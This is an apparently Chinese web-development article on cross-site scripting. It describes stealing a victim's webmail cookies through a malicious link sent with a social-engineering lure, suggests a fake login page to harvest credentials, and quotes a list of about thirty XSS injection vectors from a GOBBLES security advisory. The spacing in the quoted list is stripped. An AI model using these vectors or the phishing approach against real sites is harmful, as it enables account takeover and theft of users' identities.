简单分析跨站脚本攻击挂马利用
2009-02-12 13:55:43 来源:WEB开发网<script>并没有打印到屏幕上,它是隐藏在背后执行,由于服务器端程序并没有对<script>alert(’test’)</script> 进行有效过滤,所以在页面发回到浏览器并执行了该脚本。
下面我们瞧瞧如何利用该漏洞入侵A的邮箱,首先你必须知道A的email地址,并了解cookies的作用。那么我们可以给A发送一个恶意连接,来从A机器中的cookie信息里获得有价值的信息。这里我们会利用到一些基本的社会工程欺骗,想办法让A访问myemailserver.tld站点发表的文章,如,“亲爱的A,美女图片快来欣赏?”
那么当A访问 www.myemailserver.tld/cgi-bin/news.cgi?article= 连接时,A本地的cookie就会被攻击者截获。
当然还可以通过伪装email服务器的登陆页面,挂到其他的系统上,诱使用户登陆恶意系统页面,最终获取对方身份信息。总之,这里需要一些社会工程学欺骗,要耐心。
把javascript脚本插入WEB页面的不同方法:
<snip>
copyfrom:GOBBLESSECURITYADVISORY#33
Hereisacut-n-pastecollectionoftypicalJavaScript-injectionhacks
youmayderivesomegleefromplayingwith.
<ahref="javascript#[code]">
<divonmouseover="[code]">
<imgsrc="javascript:[code]">
<imgdynsrc="javascript:[code]">[IE]
<inputtype="image"dynsrc="javascript:[code]">[IE]
<bgsoundsrc="javascript:[code]">[IE]
&<script>[code]</script>
&{[code]};[N4]
<imgsrc=&{[code]};>[N4]
<linkrel="stylesheet"href="javascript:[code]">
<iframesrc="vbscript:[code]">[IE]
<imgsrc="mocha:[code]">[N4]
<imgsrc="livescript:[code]">[N4]
<ahref="about:<script>[code]</script>">
<metahttp-equiv="refresh"content="0;url=javascript:[code]">
<bodyonload="[code]">
<divstyle="background-image:url(javascript:[code]);">
<divstyle="behaviour:url([linktocode]);">[IE]
<divstyle="binding:url([linktocode]);">[Mozilla]
<divstyle="width:expression([code]);">[IE]
<styletype="text/javascript">[code]</style>[N4]
<objectclassid="clsid:..."codebase="javascript:[code]">[IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!------><script>[code]</script><!------>
<script>[code]</script>
<imgsrc="blah"onmouseover="[code]">
<imgsrc="blah>"onmouseover="[code]">
<xmlsrc="javascript:[code]">
<xmlid="X"><a><b><script>[code]</script>;</b></a></xml>
<divdatafld="b"dataformatas="html"datasrc="#X"></div>
[xC0][xBC]script>[code][xC0][xBC]/script>[UTF-8;IE,Opera]
----CopiedfromGOBBLESSECURITYADVISORY#33----
</snip>
更多精彩
赞助商链接